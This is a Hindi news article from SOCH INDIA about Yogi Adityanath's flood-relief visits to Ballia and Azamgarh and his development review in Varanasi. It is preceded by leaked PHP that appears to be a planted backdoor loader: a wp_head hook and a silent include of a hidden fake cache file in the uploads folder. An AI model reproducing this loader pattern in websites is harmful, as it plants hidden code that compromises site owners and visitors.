add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सीएम ने वाराणसी में की विकास कार्यों की समीक्षा, बलिया-अाजमगढ़ में बांटी राहत सामग्री – SOCH INDIA
Menu

राजनीति
सीएम ने वाराणसी में की विकास कार्यों की समीक्षा, बलिया-अाजमगढ़ में बांटी राहत सामग्री

nobanner

बलिया और आजमगढ का दौरा करने के बाद दोपहर दो बजे मुख्‍यमंत्री योगी आदित्‍यनाथ वाराणसी पहुंचे। यहां पहुंचने के बाद पुलिस लाइन हेलीपैड पर मुख्यमंत्री को गार्ड ऑफ ऑनर दिया गया। इसके बाद विधायको ने उनका हेलिपैड पर ही स्वागत सत्‍कार किया। यहां से राजकीय गेस्‍ट हाउस पहुंच कर विश्राम किया और तीन बजे मुख्‍यमंत्री मंडलायुक्‍त सभागार पहुंचे और विकास कार्यों की समीक्षा बैठक में हिस्‍सा लिया। अपने दो दिवसीय दौरे के दौरान 26 अगस्त को अफसरों के साथ बड़ी-बड़ी परियोजनाओं संग विकास कार्यक्रमों के 61 बिंदुओं की समीक्षा करेंगे।

कागजी रिपोर्ट विभागों की ओर से अपडेट पहले ही कर ली गई है लेकिन जमीनी हकीकत अच्छी नहीं है। सड़कों के गड्ढामुक्ति को लेकर विभाग भले अपने दावे करें पर जनता बेहाल है। शहर की कोई ऐसी सड़क नहीं जिसे लेकर दावा किया जा सके यह पूरी तरह गड्ढामुक्त है। भू-माफियाओं पर मुख्यमंत्री ने पिछली समीक्षा बैठक के दौरान सख्त कार्रवाई के निर्देश दिए थे पर एक पखवारे से जिले में 49 बड़े भू-माफियाओं को चिह्नित करने के बाद भी कार्रवाई नहीं की जा सकी।

रही बात आइजीआरएस यानी समन्वित शिकायत निवारण प्रणाली के पोर्टल पर आईं शिकायतों की तो अगस्त में अब तक तीन हजार से अधिक शिकायतें हैं। जुलाई की दो दर्जन से अधिक शिकायतें अभी लंबित हैं। प्रति दिन पोर्टल पर लगभग 100 शिकायतें आ रही हैं। गंभीरता से शिकायतों का निस्तारण होता तो इसकी संख्या में कमी आती लेकिन ऐसा कुछ भी नहीं है। राजस्व वादों के निस्तारण का भी वही हाल है। वर्षों के लंबित वाद को लेकर लोग परेशान हैं।

मुख्यमंत्री की समीक्षा के विषय : जघन्य अपराधों में कार्रवाई, निरोधात्मक कार्रवाई, महिला अपराधों की स्थिति, एससी-एसटी के विरुद्ध अपराध की स्थिति, यातायात व्यवस्था ,लंबित विवेचना व वांछित अपराधियों के विरुद्ध कार्रवाई, थाना समाधान दिवस, संगठित आपराधियों व माफियाओं के विरुद्ध कार्रवाई, एंटी रोमियो स्क्वायड, पुलिस पेट्रोलिंग, डायल 100, इनामी अपराधियों के विरुद्ध कार्रवाई, त्योहारों के मद्देनजर कानून व्यवस्था, कर करेतर, भू-माफियाओं के खिलाफ कार्रवाई, राजस्व वादों का निस्तारण, लोकवाणी जन सेवा केंद्रों के माध्यम से जारी होने वाली राजस्व विभाग के सेवाओं की स्थिति, बाढ़, सूखा, ओलावृष्टि, राहत उपाय, तहसील समाधान दिवस, चकबंदी वादों का निस्तारण,

आइजीआरएस व मुख्यमंत्री के कार्यालय की शिकायतों की स्थिति, चिकित्सकों की उपस्थिति, दवाओं की उपलब्धता, एंबुलेंस सेवा, राष्ट्रीय स्वास्थ्य मिशन, संस्थागत प्रसव, टीकाकरण, वेक्टरजनित रोगों डेंगू, मलेरिया आदि अधूरे निर्माण कार्य की प्रगति, राज्य, 14वें वित्त आयोग, समस्त छात्रवृत्ति, पेंशन योजना, 181 हेल्पलाइन, मनरेगा, प्रधानमंत्री ग्राम सड़क योजना, राष्ट्रीय ग्रामीण पेयजल योजना, राष्ट्रीय खाद्य सुरक्षा योजना, नई सड़कों का निर्माण, सेतुओं का निर्माण, सड़कों का गड्ढामुक्त की स्थिति, स्वच्छ भारत मिशन, नगरीय स्ट्रीट लाइटिंग, अमृत एवं स्मार्ट सिटी योजना, अपशिष्ट प्रबंधन,

नमामि गंगे परियोजना, कक्षा आठ तक के बच्चों को ड्रेस, किताबों के वितरण की स्थिति, छात्रों का नामांकन, रोस्टर अनुसार विद्युत आपूर्ति, ग्रामों का ऊर्जीकरण, ट्रांसफार्मरों का प्रतिस्थापन, नए विद्युत कनेक्शन के लक्ष्य, पारदर्शी किसान सेवा योजना, खाद बीज इनपुट, ऋण माफी योजना, पीएम आवास योजना, आइसीडीएस, ई-टेंडरिंग, 50 लाख से अधिक की अधूरी परियोजनाएं, अवैध खनन, नहरों में टेल तक पानी पहुंचने का मामला आदि।
समीक्षा बैठक के बाद मुख्‍यमंत्री विशिष्‍टजनों से सर्किट हाउस में 5:30 बजे मुलाकात करेंगे और इसके बाद रात्रि 8 बजे होटल रमाडा में जिले के प्रधानाचार्यों संग विचार- विमर्श व रात्रि भोज भी प्रस्‍तावित है।

मुख्यमंत्री योगी आदित्यनाथ आज सुबह बलिया में घाघरा की बाढ़ से प्रभावित लोगों से मिलने के लिए पहुंचे। लोगों से मुलाकात के दौरान मुख्‍यमंत्री ने कहा कि सूबे के 25 जिले बाढ से प्रभावित हैं लिहाजा बाढ पीडि़तों से मिलने निकला हूं। पीडितों को किसी के आगे हाथ न फैलाना पडे़ और प्रशासन घर तक प्रभावितों को सहायता पहुंचाएं इस पर जोर है।

वहीं आज़मगढ़ में योगी आदित्यनाथ ने कहा कि आपदा हम रोक नहीं सकते लेकिन सबको राहत उपलब्ध कराने की कोशिश कर रहे हैं। सभी लोग बाढ़ पीड़ितों की मदद करें। नेपाल से पानी आता है। जन धन की हानि भी हो रहा है। केंद सरकार नेपाल से बात कर इसका स्थायी समाधान कर रही है। कच्चे मकान क्षतिग्रस्त होता है तो उसे भी राहत मिल रही है। सीधे उनको धन खाते में पहुँचे। यूपी की सरकार 25 जनपदों में यह सारी सुविधा दे रही हैं।

इस बीच सीएम को कुछ छात्रों ने काला झंडा भी दिखाने का प्रयास किया जिनको मौके से हिरासत में ले लिया गया। बलिया के बाद दाेपहर में वह आजमगढ के सगड़ी तहसील के एक विद्यालय में बाढ़ प्रभावितों से मिलने के लिए पहुंचे जहां बाढ प्रभावितों से मुलाकात कर उनकी कुशलक्षेम पूछने के बाद राहत सामग्री का भी वितरण किया। इस दौरान कई प्रभावितों को चार चार लाख का चेक भी सौंपा।

वह तीसरे पहर अपने दो दिनी दौरे पर वाराणसी भी पहुंचेंगे। आजमगढ़ व बलिया में जहां मुख्यमंत्री बाढ़ प्रभावितों के बीच राहत सामग्री का वितरण करेंगे वहीं वाराणसी में पहले दिन समीक्षा बैठक करने के साथ ही प्रधानाचार्यों की एक बैठक में भी शामिल होंगे। कुछ विशिष्टजनों से मुलाकात करने के बाद मुख्यमंत्री वाराणसी में ही रात्रि विश्राम करेंगे।